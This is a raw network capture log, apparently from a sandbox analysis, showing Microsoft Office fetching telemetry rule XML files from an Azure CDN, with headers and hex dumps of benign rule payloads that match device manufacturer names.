                                                                                                              2024-12-05 09:38:27 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 472
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                              x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093827Z-1746fd949bddtfvqhC1EWRxbpg00000002eg0000000042vt
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              35192.168.2.64976613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:27 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 486
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                              x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093827Z-1746fd949bdhk6hphC1EWRaw3c000000027g000000005y0q
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              36192.168.2.64976513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:27 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 427
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                              x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093827Z-1746fd949bd2cq7chC1EWRnx9g000000024g000000004yan
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              37192.168.2.64976813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:29 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:29 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 423
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                              x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093829Z-1746fd949bdkw94lhC1EWRxuz400000002qg000000003xys
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:29 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              38192.168.2.64976913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:29 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 478
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                              x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093829Z-1746fd949bd4w8sthC1EWR700400000002a0000000002ncy
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:30 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              39192.168.2.64977013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:29 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 404
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                              x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093829Z-1746fd949bd77mkmhC1EWR5efc00000002u0000000003895
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:30 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              40192.168.2.64977213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:29 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 400
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                              x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093829Z-1746fd949bdmv56chC1EWRypnn00000002n00000000060w7
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:30 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              41192.168.2.64977113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:29 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 468
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                              x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093829Z-1746fd949bd6zq92hC1EWRry4800000002g0000000003ka6
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              42192.168.2.64977313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:31 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:31 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:31 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 479
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                              x-ms-request-id: 46349be7-d01e-0017-71d1-45b035000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093831Z-1746fd949bd6ztf6hC1EWRvq2s000000024g0000000057f9
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:31 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              43192.168.2.64977413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:31 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:32 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 425
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                              x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093832Z-1746fd949bd54zxghC1EWRzre400000002w00000000013c9
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:32 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              44192.168.2.64977613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:31 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:32 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 448
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                              x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093832Z-1746fd949bdlqd7fhC1EWR6vt000000002n0000000006ccr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
